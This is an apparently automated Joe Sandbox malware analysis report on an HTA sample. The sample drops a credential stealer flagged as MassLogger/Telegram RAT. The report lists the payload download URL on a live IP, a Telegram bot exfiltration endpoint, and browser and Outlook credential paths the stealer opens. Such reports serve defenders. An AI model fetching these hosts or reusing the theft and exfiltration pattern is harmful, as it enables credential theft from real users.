                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00054E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_00054E87
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00061E06 GetUserNameW,6_2_00061E06
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00053F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,6_2_00053F3A
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_000249A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected MSIL Logger
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csso.exe.30f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csso.exe.30f0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csso.exe PID: 7620, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7656, type: MEMORYSTR
                    Yara detected MassLogger RAT
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csso.exe.30f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csso.exe.30f0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csso.exe PID: 7620, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7656, type: MEMORYSTR
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csso.exe.30f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csso.exe.30f0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csso.exe PID: 7620, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7656, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: csso.exeBinary or memory string: WIN_81
                    Source: csso.exeBinary or memory string: WIN_XP
                    Source: csso.exeBinary or memory string: WIN_XPe
                    Source: csso.exeBinary or memory string: WIN_VISTA
                    Source: csso.exeBinary or memory string: WIN_7
                    Source: csso.exeBinary or memory string: WIN_8
                    Source: csso[1].exe.3.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csso.exe.30f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csso.exe.30f0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2527369873.0000000002766000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csso.exe PID: 7620, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7656, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected MSIL Logger
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csso.exe.30f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csso.exe.30f0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csso.exe PID: 7620, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7656, type: MEMORYSTR
                    Yara detected MassLogger RAT
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csso.exe.30f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csso.exe.30f0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csso.exe PID: 7620, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7656, type: MEMORYSTR
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csso.exe.30f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.csso.exe.30f0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csso.exe PID: 7620, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7656, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00096283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,6_2_00096283
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00096747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_00096747

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure2
                    Valid Accounts                    		11
                    Native API                    		1
                    DLL Side-Loading                    		1
                    Exploitation for Privilege Escalation                    		11
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts11
                    Command and Scripting Interpreter                    		2
                    Valid Accounts                    		1
                    DLL Side-Loading                    		11
                    Deobfuscate/Decode Files or Information                    		121
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts3
                    PowerShell                    		Logon Script (Windows)2
                    Valid Accounts                    		3
                    Obfuscated Files or Information                    		Security Account Manager2
                    File and Directory Discovery                    		SMB/Windows Admin Shares11
                    Email Collection                    		2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                    Access Token Manipulation                    		1
                    DLL Side-Loading                    		NTDS128
                    System Information Discovery                    		Distributed Component Object Model121
                    Input Capture                    		23
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                    Process Injection                    		1
                    Masquerading                    		LSA Secrets231
                    Security Software Discovery                    		SSH3
                    Clipboard Data                    		Fallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Valid Accounts                    		Cached Domain Credentials21
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                    Virtualization/Sandbox Evasion                    		DCSync3
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                    Access Token Manipulation                    		Proc Filesystem11
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                    Process Injection                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Network Configuration Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1636641 Sample: uhg.hta Startdate: 13/03/2025 Architecture: WINDOWS Score: 100 45 reallyfreegeoip.org 2->45 47 checkip.dyndns.org 2->47 49 checkip.dyndns.com 2->49 59 Suricata IDS alerts for network traffic 2->59 61 Found malware configuration 2->61 63 Malicious sample detected (through community Yara rule) 2->63 67 13 other signatures 2->67 10 mshta.exe 1 2->10         started        signatures3 65 Tries to detect the country of the analysis system (by using the IP) 45->65 process4 signatures5 77 Suspicious command line found 10->77 79 PowerShell case anomaly found 10->79 13 cmd.exe 1 10->13         started        process6 signatures7 81 Detected Cobalt Strike Beacon 13->81 83 Suspicious powershell command line found 13->83 85 PowerShell case anomaly found 13->85 16 powershell.exe 43 13->16         started        21 conhost.exe 13->21         started        process8 dnsIp9 43 23.95.235.28, 49694, 80 AS-COLOCROSSINGUS United States 16->43 35 C:\Users\user\AppData\Roaming\csso.exe, PE32 16->35 dropped 37 C:\Users\user\AppData\Local\...\csso[1].exe, PE32 16->37 dropped 39 C:\Users\user\AppData\...\hbmngfjp.cmdline, Unicode 16->39 dropped 55 Loading BitLocker PowerShell Module 16->55 57 Powershell drops PE file 16->57 23 csso.exe 2 16->23         started        26 csc.exe 3 16->26         started        file10 signatures11 process12 file13 69 Antivirus detection for dropped file 23->69 71 Multi AV Scanner detection for dropped file 23->71 73 Binary is likely a compiled AutoIt script file 23->73 75 3 other signatures 23->75 29 RegSvcs.exe 15 2 23->29         started        41 C:\Users\user\AppData\Local\...\hbmngfjp.dll, PE32 26->41 dropped 33 cvtres.exe 1 26->33         started        signatures14 process15 dnsIp16 51 checkip.dyndns.com 158.101.44.242, 49695, 80 ORACLE-BMC-31898US United States 29->51 53 reallyfreegeoip.org 104.21.80.1, 443, 49696 CLOUDFLARENETUS United States 29->53 87 Tries to steal Mail credentials (via file / registry access) 29->87 89 Tries to harvest and steal browser information (history, passwords, etc) 29->89 signatures17

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    uhg.hta34%VirustotalBrowse
                    uhg.hta24%ReversingLabsScript-WScript.Trojan.Asthma

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\csso.exe100%AviraTR/AD.SnakeStealer.nvufs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csso[1].exe100%AviraTR/AD.SnakeStealer.nvufs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csso[1].exe71%ReversingLabsWin32.Spyware.Negasteal
                    C:\Users\user\AppData\Roaming\csso.exe71%ReversingLabsWin32.Spyware.Negasteal

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://23.95.235.28/50/csso.exe0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    reallyfreegeoip.org
                    		104.21.80.1
                    		truefalse
                      		high
                      checkip.dyndns.com
                      		158.101.44.242
                      		truefalse
                        		high
                        checkip.dyndns.org
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://23.95.235.28/50/csso.exetrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            		high
                            http://checkip.dyndns.org/false
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1401229011.00000000055F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.microsoftpowershell.exe, 00000003.00000002.1404410976.0000000007E17000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://reallyfreegeoip.orgdRegSvcs.exe, 00000007.00000002.2527369873.00000000026AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Licensepowershell.exe, 00000003.00000002.1401229011.00000000055F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Iconpowershell.exe, 00000003.00000002.1401229011.00000000055F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://checkip.dyndns.orgRegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2527369873.000000000267E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://reallyfreegeoip.org/xml/8.46.123.189lRegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://checkip.dyndns.comdRegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.1399001221.0000000004591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://checkip.dyndns.org/qcsso.exe, 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://contoso.com/powershell.exe, 00000003.00000002.1401229011.00000000055F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1401229011.00000000055F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://reallyfreegeoip.org/xml/8.46.123.189dRegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://reallyfreegeoip.orgRegSvcs.exe, 00000007.00000002.2527369873.00000000026AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://checkip.dyndns.orgdRegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://reallyfreegeoip.orgRegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://checkip.dyndns.comRegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://checkip.dyndns.org/dRegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1399001221.0000000004591000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2527369873.0000000002611000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://api.telegram.org/bot-/sendDocument?chat_id=csso.exe, 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://reallyfreegeoip.org/xml/csso.exe, 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high

                                                                                    World Map of Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public IPs

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    23.95.235.28
                                                                                    		unknownUnited States
                                                                                    		36352AS-COLOCROSSINGUStrue
                                                                                    158.101.44.242
                                                                                    		checkip.dyndns.comUnited States
                                                                                    		31898ORACLE-BMC-31898USfalse
                                                                                    104.21.80.1
                                                                                    		reallyfreegeoip.orgUnited States
                                                                                    		13335CLOUDFLARENETUSfalse

                                                                                    General Information

                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                    Analysis ID:1636641
                                                                                    Start date and time:2025-03-13 01:17:47 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 6m 53s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:12
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:uhg.hta
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.expl.evad.winHTA@14/15@2/3
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    • Number of executed functions: 62
                                                                                    • Number of non-executed functions: 260
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .hta

                                                                                    Warnings

                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 2.16.185.191, 20.109.210.53
                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    20:18:51API Interceptor42x Sleep call for process: powershell.exe modified

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    23.95.235.28Neue Bestellung 236904.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 23.95.235.28/xampp/rsc/uhg.hta
